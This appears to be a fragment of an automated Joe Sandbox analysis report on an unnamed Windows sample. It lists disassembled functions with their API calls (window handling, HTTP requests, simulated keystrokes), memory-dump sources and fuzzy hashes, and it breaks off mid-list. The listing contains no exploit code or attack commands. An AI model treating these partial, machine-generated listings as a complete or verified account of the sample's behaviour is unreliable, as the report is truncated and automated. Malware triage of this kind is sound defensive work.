                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ChildEnumWindows
                                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                        • API String ID: 3555792229-1603158881
                                                                                                                                        • Opcode ID: 790e3daa97ce00e0327acd960355e3b262efc87248c43c951695a82da3e9b2c8
                                                                                                                                        • Instruction ID: 751daaac2879b298e2a41a8cac7813dd4f68057acdbb5d8249581d7a3d7da3d5
                                                                                                                                        • Opcode Fuzzy Hash: 790e3daa97ce00e0327acd960355e3b262efc87248c43c951695a82da3e9b2c8
                                                                                                                                        • Instruction Fuzzy Hash: 1F91E570A00506EACF28EF64D495BEDFB75FF05350F148129D84AA7151DF386D9ACBA0
                                                                                                                                        Function 007645A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007645F0
                                                                                                                                        • CoUninitialize.COMBASE ref: 00764695
                                                                                                                                        • UnregisterHotKey.USER32(?), ref: 007647BD
                                                                                                                                        • DestroyWindow.USER32(?), ref: 007D5936
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 007D599D
                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 007D59CA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                        • String ID: close all
                                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                                        • Opcode ID: 63d8890416955f642685a7588a86dfad427a577e94e6bc3bd4d7cb378848868c
                                                                                                                                        • Instruction ID: b69afd2a9c18867956fba44cfe6fdf056d412a1059d80d7f5f1311c8d13a78c6
                                                                                                                                        • Opcode Fuzzy Hash: 63d8890416955f642685a7588a86dfad427a577e94e6bc3bd4d7cb378848868c
                                                                                                                                        • Instruction Fuzzy Hash: 35913F34601602CFC755EF14C8A9E68F3B4FF15714F5482A9E80BA7262DB38AE66CF14
                                                                                                                                        Function 0077C24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 0077C2D2
                                                                                                                                          • Part of subcall function 0077C697: GetClientRect.USER32(?,?), ref: 0077C6C0
                                                                                                                                          • Part of subcall function 0077C697: GetWindowRect.USER32(?,?), ref: 0077C701
                                                                                                                                          • Part of subcall function 0077C697: ScreenToClient.USER32(?,000000FF), ref: 0077C729
                                                                                                                                        • GetDC.USER32 ref: 007DE006
                                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007DE019
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 007DE027
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 007DE03C
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 007DE044
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007DE0CF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                        • String ID: U
                                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                                        • Opcode ID: 970b6981b45149551e9dc057038c598a66d9b3ec12c5faf5ba5f9e29b78d80f2
                                                                                                                                        • Instruction ID: 01ced1356d0e0bf60bbea5161228a0e0575acc6b5992f2ad4516ae3dfc25ef7e
                                                                                                                                        • Opcode Fuzzy Hash: 970b6981b45149551e9dc057038c598a66d9b3ec12c5faf5ba5f9e29b78d80f2
                                                                                                                                        • Instruction Fuzzy Hash: 2471E331500208EFCF32AF64CCC4AAA7BB5FF59350F24826AED555A2A6C7398C51DB61
                                                                                                                                        Function 007B4C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007B4C5E
                                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007B4C8A
                                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 007B4CCC
                                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007B4CE1
                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B4CEE
                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007B4D1E
                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 007B4D65
                                                                                                                                          • Part of subcall function 007B56A9: GetLastError.KERNEL32(?,?,007B4A2B,00000000,00000000,00000001), ref: 007B56BE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1241431887-3916222277
                                                                                                                                        • Opcode ID: d43049e0b77ab51944e17a8b27784a8326859453f5b138fb8b8599b41cee34d2
                                                                                                                                        • Instruction ID: 2b7d376d9ac1eb765c6e039c727f9f71bba33e2dc54e887a28cd45bc8b32069e
                                                                                                                                        • Opcode Fuzzy Hash: d43049e0b77ab51944e17a8b27784a8326859453f5b138fb8b8599b41cee34d2
                                                                                                                                        • Instruction Fuzzy Hash: C74191B1601618BFEB129F60CC89FFB7BACFF08714F10811AFA019A152D7789D448BA4
                                                                                                                                        Function 007BBAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,007FDBF0), ref: 007BBBA1
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007FDBF0), ref: 007BBBD5
                                                                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007BBD33
                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 007BBD5D
                                                                                                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 007BBEAD
                                                                                                                                        • ProgIDFromCLSID.COMBASE(?,?), ref: 007BBEF7
                                                                                                                                        • CoTaskMemFree.COMBASE(?), ref: 007BBF14
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 793797124-0
                                                                                                                                        • Opcode ID: 419c091d77a87f9c3734cc9517bdaa49e8e43f8c9dc2d4788799b824d954115c
                                                                                                                                        • Instruction ID: be8fef13b3b16411ebf85fed597dc99cb6a442d0ae06493eea6a0a5835a5b617
                                                                                                                                        • Opcode Fuzzy Hash: 419c091d77a87f9c3734cc9517bdaa49e8e43f8c9dc2d4788799b824d954115c
                                                                                                                                        • Instruction Fuzzy Hash: 5FF10975A00109EFCB14DFA4C888EEEB7B9FF89314F148459F906AB250DB75AE45CB90
                                                                                                                                        Function 0077B86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007649CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00764954,00000000), ref: 00764A23
                                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0077B85B), ref: 0077B926
                                                                                                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0077B85B,00000000,?,?,0077AF1E,?,?), ref: 0077B9BD
                                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 007DE775
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007DE7EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2402799130-0
                                                                                                                                        • Opcode ID: 50e35456a4c4a62d6e97e78e0ed808d9d83fea86778ffc44b0702b45a683a368
                                                                                                                                        • Instruction ID: 86fc636a1ad7d63c5e9cc8f9c7870732bba19597b088d0f24504f746bba57973
                                                                                                                                        • Opcode Fuzzy Hash: 50e35456a4c4a62d6e97e78e0ed808d9d83fea86778ffc44b0702b45a683a368
                                                                                                                                        • Instruction Fuzzy Hash: 4D619C34500701DFDF32AF25D888B25B7F1FB59351F24852AE29A8AA60C778B892DF40
                                                                                                                                        Function 007CB14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007CB204
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InvalidateRect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 634782764-0
                                                                                                                                        • Opcode ID: a6a34f77cae889ee778c17562e1cdec1a4e6f85d04aea88384f98aee9f5bcdb1
                                                                                                                                        • Instruction ID: 8642dfe7406f76b56c4fb96680ef005523663327f475f8685b9701935f175843
                                                                                                                                        • Opcode Fuzzy Hash: a6a34f77cae889ee778c17562e1cdec1a4e6f85d04aea88384f98aee9f5bcdb1
                                                                                                                                        • Instruction Fuzzy Hash: 63517130600258FFEF309B688C9AF9E7B65FB0A360F24811DFA15D61A1C779ED509B50
                                                                                                                                        Function 0077A599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007DE9EA
                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007DEA0B
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007DEA20
                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007DEA3D
                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007DEA64
                                                                                                                                        • DestroyCursor.USER32(00000000), ref: 007DEA6F
                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007DEA8C
                                                                                                                                        • DestroyCursor.USER32(00000000), ref: 007DEA97
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3992029641-0
                                                                                                                                        • Opcode ID: bbbba833f98485f9d0ec69715ce820ca620a96a57575cb6f6c60736db67d0326
                                                                                                                                        • Instruction ID: e9242d45c0718e3696d9cd1c2e06ef2a91970084aabcebd34a29a7e216d2b92c
                                                                                                                                        • Opcode Fuzzy Hash: bbbba833f98485f9d0ec69715ce820ca620a96a57575cb6f6c60736db67d0326
                                                                                                                                        • Instruction Fuzzy Hash: 14517A70600205EFEF20DF64CC85FAA77B5BB98390F108629F94ADB290D778EC918B51
                                                                                                                                        Function 0077F6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,007DE9A0,00000004,00000000,00000000), ref: 0077F737
                                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,007DE9A0,00000004,00000000,00000000), ref: 0077F77E
                                                                                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,007DE9A0,00000004,00000000,00000000), ref: 007DEB55
                                                                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,007DE9A0,00000004,00000000,00000000), ref: 007DEBC1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ShowWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1268545403-0
                                                                                                                                        • Opcode ID: de07ff0f0394f00ca0d0526bf2902545ac5657ca607ae0697f522cc4ac7de588
                                                                                                                                        • Instruction ID: b0d7121128d30aa4d9e91c36ca912f1847e6c0e0b167eae43223a585ffe7d484
                                                                                                                                        • Opcode Fuzzy Hash: de07ff0f0394f00ca0d0526bf2902545ac5657ca607ae0697f522cc4ac7de588
                                                                                                                                        • Instruction Fuzzy Hash: E2411B70304680DADF3D5B288ECCB7A7AA56B55395FA4C83FE08F8B561C67CA840D751
                                                                                                                                        Function 0079CDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 0079E158
                                                                                                                                          • Part of subcall function 0079E138: GetCurrentThreadId.KERNEL32 ref: 0079E15F
                                                                                                                                          • Part of subcall function 0079E138: AttachThreadInput.USER32(00000000,?,0079CD34,?,00000001), ref: 0079E166
                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0079CE06
                                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0079CE23
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0079CE26
                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0079CE2F
                                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0079CE4D
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0079CE50
                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0079CE59
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0079CE70
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0079CE73
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2014098862-0
                                                                                                                                        • Opcode ID: 6baf842eb411e14cb2cee00de845d1e32f2696c6c6874a3f98b9b5c6051c63f8
                                                                                                                                        • Instruction ID: f4f7980872e668b9d65a5677a1d5a5b4f4b0377418f83085bbc6be63670b0e60
                                                                                                                                        • Opcode Fuzzy Hash: 6baf842eb411e14cb2cee00de845d1e32f2696c6c6874a3f98b9b5c6051c63f8
                                                                                                                                        • Instruction Fuzzy Hash: 541104B155061CBFFB216F609C8EF6A3A2DDB0C794F110415F3406F0E0C9FA6C009AA8
                                                                                                                                        Function 007BC604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079A857: CLSIDFromProgID.COMBASE ref: 0079A874
                                                                                                                                          • Part of subcall function 0079A857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 0079A88F
                                                                                                                                          • Part of subcall function 0079A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0079A89D
                                                                                                                                          • Part of subcall function 0079A857: CoTaskMemFree.COMBASE(00000000), ref: 0079A8AD
                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 007BC6AD
                                                                                                                                        • _memset.LIBCMT ref: 007BC6BA
                                                                                                                                        • _memset.LIBCMT ref: 007BC7D8
                                                                                                                                        • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 007BC804
                                                                                                                                        • CoTaskMemFree.COMBASE(?), ref: 007BC80F
                                                                                                                                        Strings
                                                                                                                                        • NULL Pointer assignment, xrefs: 007BC85D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                                        • API String ID: 1300414916-2785691316
                                                                                                                                        • Opcode ID: 4dfd86f2fee62486b65c02674ded70ed0d600c0b04ff0f990ded9a2454210187
                                                                                                                                        • Instruction ID: c9da063fdbda08eeac2fd7f1dced819f771bd0b6c1efb96880c03f324bd18a10
                                                                                                                                        • Opcode Fuzzy Hash: 4dfd86f2fee62486b65c02674ded70ed0d600c0b04ff0f990ded9a2454210187
                                                                                                                                        • Instruction Fuzzy Hash: 8E912A71D00218EBDB21DFA4DC85EDEBBB9EF08750F10816AF919A7281DB745A45CFA0
                                                                                                                                        Function 007C9882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007C9926
                                                                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 007C993A
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007C9954
                                                                                                                                        • _wcscat.LIBCMT ref: 007C99AF
                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 007C99C6
                                                                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007C99F4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
